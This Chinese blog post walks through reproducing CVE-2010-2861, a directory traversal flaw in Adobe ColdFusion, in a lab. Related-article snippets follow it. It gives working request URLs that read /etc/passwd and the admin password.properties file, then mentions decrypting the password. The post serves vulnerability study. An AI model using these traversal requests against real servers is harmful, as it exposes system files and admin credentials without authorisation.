coldfusion文件读取漏洞(CVE-2010-2861)

最新推荐文章于 2024-05-14 23:46:30 发布
最新推荐文章于 2024-05-14 23:46:30 发布
阅读量862 收藏
点赞数
文章标签: CVE-2010-2861
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41617034/article/details/126027760
版权

声明:本人所有文章均为技术分享,请勿非法用于其他用途,否则后果自负。

漏洞描述

CVE-2010-2861

Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。

Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。

漏洞影响

ColdFusion MX6 6.1 base patches
ColdFusion MX7 7,0,0,91690 base patches
ColdFusion MX8 8,0,1,195765 base patches
ColdFusion MX8 8,0,1,195765 with Hotfix4

漏洞复现

1、直接访问http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/…/…/…/etc/passwd%00en,即可读取文件/etc/passwd
在这里插入图片描述
在这里插入图片描述

2、读取后台管理员密码http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/lib/password.properties%00en
在这里插入图片描述
在这里插入图片描述

解密password
在这里插入图片描述

漏洞修复

打补丁、升级版本

1stPeak
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Adobe ColdFusion 文件读取漏洞CVE-2010-2861
weixin_50698958的博客
10-02 426
一、概述 Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。 参考: https://vulhub.org/#/environments/coldfusion/CVE-2010-2861/ 二、漏洞环境 路径:vulhub/coldfusion/CVE.
coldfusion-10-11-xss:CVE-2015-0345 (APSB15-07) 的概念验证代码
05-31
此存储库包含 CVE-2015-0345 (APSB15-07) 的 XSS 向量,允许在 ColdFusion 安装上获得远程命令执行。 此漏洞仅对 ColdFusion 10 和 11 安装有效。 具体来说,ColdFusion 11, Update 11 和 ColdFusion 10, Update 16...
Adobe ColdFusion文件读取(CVE-2010-2861)
m0_65150886的博客
01-15 434
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。由于AJP协议设计存在缺陷导致内部相关的属性可控,攻击者可以构造属性值,使未授权的用户读取服务器任意文件获得敏感信息,甚至可以进行远程代码执行漏洞的利用。1.访问http://ip:port,出现如下页面,开始实验。2.构造poc,读取/etc/passwd。3.构造poc,读取后台管理员密码。
[文件读取]coldfusion 文件读取CVE-2010-2861
wj33333的博客
11-14 293
描述: Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。访问`http://your-ip:8500/CFIDE/administrator/enter.cfm`,可以看到初始化页面,输入密码`admin`,开始初始化整个环境。
09 - vulhub - Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)
最新发布
碧海朝天素
05-14 766
如果你也是看准了Python,想自学Python,在这里为大家准备了丰厚的免费大礼包,带大家一起学习,给大家剖析Python兼职、就业行情前景的这些事儿。
漏洞复现-coldfusion-文件读取】vulfocus/coldfusion-cve_2010_2861
10-15 950
coldfusion-文件读取
Adobe ColdFusion 目录遍历漏洞 (CVE-2010-2861)
zzzzz1284的博客
01-04 321
CVE-2010-2861
Coldfusion-11-Application.cfc-Template:脚本样式 Application.cfc 模板,包含 Coldfusion 11 的所有方法
06-13
Coldfusion-11-Application.cfc-模板 包含 Coldfusion 11 的所有方法的脚本样式 Application.cfc 模板。 我对 Adob​​e 的文档和缺乏脚本风格的 Coldfusion 11 示例感到沮丧,所以我创建了这个。 如何使用 更改...
ColdFusion-Realtime-With-WebSockets-Demo-Code:在 Realtime With WebSockets 演示中使用的演示代码
07-24
资产现场演示 UI 共享的 CSS 和 JavaScript 文件css js 聊天聊天演示html到coldfusion HTML 到 ColdFusion WebSocket 示例。 现场演示演示-01 最低要求演示-02 高级套接字示例其他演示文件socket.io ( ) 这是...
cf-tinymce:用于创建tinyMCE实例的ColdFusion函数-支持压缩和每页多个实例
04-29
概要ColdFusion函数用于创建tinyMCE实例-使用CFN并允许每页多个实例。 这是一个不错的基础,具有不错的默认设置。程式码范例要显示一个充满名为“ read”的查询的生物信息的RTE实例,请执行以下操作: <cfoutput>#...
Modus (ColdFusion CMS framework)-开源
04-24
**Modus:冷杉(ColdFusion)CMS框架——开源宝藏** Modus是一个专为ColdFusion开发者设计的开源内容管理系统(CMS)框架。它的核心目标是为ColdFusion社区带来一个轻量级且功能强大的内容对象系统。该框架充分利用...
ElasticSearch 目录穿越漏洞CVE-2015-3337)
黑白的博客
12-13 2197
声明 好好学习,天天向上 漏洞描述 在安装了具有“site”功能的插件以后,插件目录使用…/即可向上跳转,导致目录穿越漏洞,可读取任意文件。没有安装任意插件的elasticsearch不受影响。 影响范围 1.4.5以下/1.5.2以下 复现过程 这里使用v1.4.4版本 使用vulhub cd /app/vulhub-master/elasticsearch/CVE-2015-3337 使用docker启动 docker-compose up -d 环境启动后,访问http://your-ip:920
vulhub:Adobe ColdFusion文件读取漏洞复现(CVE-2010-2861
sszsNo1的博客
07-02 248
vulhub:Adobe ColdFusion文件读取漏洞CVE-2010-2861)如何复现
Adobe ColdFusion文件读取漏洞CVE-2010-2861
m0_73605862的博客
12-01 528
2.看答案就是一层一层进行路径穿越攻击,这里要注意如果登陆进去后总是会自己跳转到index.cfm,所以得用bp抓包改包。尝试利用漏洞读取目标系统中的“opt/coldfusion8/license.txt"文件。4.然后是opt那个,因为一般opt和etc在同一级目录下,结果成功了。3.之前一直出不来,今天突然出来了,我真的无语死了。1.环境搭建(网上写的密码是admin,就用admin)3.路径穿越就出来了。
cfm在哪些应用服务器可执行,CFM格式文件 如何打开CFM文件 CFM是什么格式的文件 用什么打开 - The X 在线工具...
weixin_31308407的博客
08-02 916
.CFM 文件是包含ColdFusion代码或CFML(ColdFusion标记语言)的网页。当用户访问页面时,ColdFusion web服务器将动态执行该操作。.CFM 文件可以运行ColdFusion应用程序和用CFScript编写的脚本,并可以引用数据库信息、生成表单和动态创建PDF报告。说明:如果您是一名web开发人员,并且将ColdFusion功能集成到您的网页中,那么您很可能只会遇到...
漏洞复现----17、Adobe ColdFusion目录遍历漏洞 (CVE-2010-2861)
七天
10-21 1056
文章目录一、漏洞介绍二、漏洞环境1、环境2、Payload三、漏洞复现1、logging/settings.cfm2、datasources/index.cfm3、j2eepackaging/editarchive.cfm4、CFIDE/administrator/settings/mappings.cfm5、CFIDE/administrator/enter.cfm四、特殊构造1、路径后不跟参数值,失败。2、路径后参数值为数字,成功。3、路径后参数值为字母,成功。4、路径后参数值为特殊符号,成功。 一、
漏洞分析|Adobe ColdFusion 序列化漏洞CVE-2023-29300)
m0_46699477的博客
08-02 1014
通过研究 CVE-2023-29300,我们了解了 Adobe ColdFusion 产品的基本工作原理,其不安全的 WDDX 序列化实现将产生可利用的漏洞。同时,我们详细分析了通过 argumentCollection 参数传入 payload 的完整调用路径,以及为何需要传入看似与利用无关的 method 参数。在此基础上,我们探索了利用的新方向,在这个过程中也踩了不少坑。阅读本篇文章后,大家在复现此漏洞以及在将来需要研究此产品时,就可以少走一些弯路了,后续有机会的话,会进一步分享研究成果。
Adobe ColdFusion 文件读取漏洞CVE-2010-2861)复现,python编写POC和EXP
wangqiao258的博客
09-30 457
Adobe ColdFusion 文件读取漏洞CVE-2010-2861)复现,python编写POC 环境搭建 使用vulhub,进入对应文件夹启动Adobe CanFusion 8.0.1版本服务器: [root@localhost ~]# cd /home/vulhub-master/coldfusion/CVE-2010-2861/ [root@localhost CVE-2010-2861]# docker-compose up -d 查看端口: [root@localhost ~]# d
cve20201938
07-16
CVE-2020-1938是一个Apache Tomcat服务器漏洞,该漏洞影响Tomcat 9.0.0.M1至9.0.31和Tomcat 10.0.0-M1至10.0.0-M5版本。 这个漏洞可以导致远程攻击者通过特制的请求发送恶意代码,从而执行任意代码,绕过安全限制,并进一步控制目标服务器。攻击者可以通过发送包含特殊处理器的恶意请求来触发该漏洞。 这个漏洞是由于Tomcat服务器在处理非标准的HTTP扩展协议(如AJP协议)时的缺陷造成的。攻击者可以发送恶意的AJP协议请求,并利用Tomcat服务器处理这些请求时的逻辑缺陷来执行任意代码。 为了解决这个漏洞,Apache Tomcat发布了两个升级版本。首先是Tomcat 9.0.31,然后是Tomcat 10.0.0-M6。这些更新版本修复了在处理AJP协议请求时的逻辑缺陷,确保服务器安全性。 为了保护服务器免受该漏洞的攻击,建议及时升级至修复版本。除了升级之外,还可以采取其他措施,如限制服务器对AJP协议的使用、配置防火墙规则来限制访问Tomcat服务器的IP地址等。 总而言之,CVE-2020-1938是Apache Tomcat服务器的一个严重漏洞,可能导致远程执行任意代码。及时升级至修复版本,并采取适当的安全措施,是保护服务器安全的关键。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

1stPeak

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值